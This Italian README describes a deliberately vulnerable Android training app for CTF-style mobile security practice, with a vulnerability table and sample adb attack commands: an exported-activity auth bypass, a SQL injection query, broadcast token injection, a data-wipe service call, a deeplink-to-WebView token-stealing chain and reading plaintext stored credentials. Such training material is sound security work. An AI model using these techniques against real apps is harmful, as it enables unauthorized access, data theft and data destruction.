
App Android deliberatamente vulnerabile per la ricerca sulla sicurezza mobile e la pratica del bug bounty - OWASP Mobile Top 10
Un'applicazione Android deliberatamente vulnerabile per la ricerca sulla sicurezza mobile, la pratica del bug bounty e l'apprendimento in stile CTF. Contiene 21 vulnerabilità documentate mappate all'OWASP Mobile Top 10.
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
Avvia l'app, affronta ogni lab, cattura le flag e inviale sulla scoreboard CTF integrata nell'app.
| Categoria | Vulnerabilità | Flag |
|---|---|---|
| WebView | WV-01 to WV-05 | 5 |
| Deeplink | DL-01 to DL-04, DL-CHAIN | 5 |
| Auth / SQL Injection | SQL-01 | 1 |
| Admin Panel | AP-01 to AP-04 | 2 |
| ContentProvider | CP-01 | 1 |
| Broadcast Receiver | BR-01 to BR-03 | 2 |
| Service | SV-01, SV-02a, SV-02b | 2 |
| Network Interception | NET-01 | 1 |
| Banking / OTP | OTP-01 | 1 |
| LFI | LFI-01 | 1 |
| Storage | STORE-01 | 1 |
| XSS | XSS-01, XSS-02 | 2 |
20 flag in totale, più una master flag assegnata per averle catturate tutte.
| Lab List | CTF Scoreboard |
|---|---|
| lab |
# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""
# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker
# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data
# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"
# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml
# Watch for logged secrets
adb logcat | grep Gu3ssWeak
Questo progetto è puramente educativo. Tutte le vulnerabilità sono intenzionali e documentate. Le tecniche mostrate qui si applicano ad app reali, ma testa solo sistemi che possiedi o che sei autorizzato a testare. Vedi SECURITY.md per il disclaimer completo e le linee guida sulla divulgazione responsabile.
MIT - vedi LICENSE.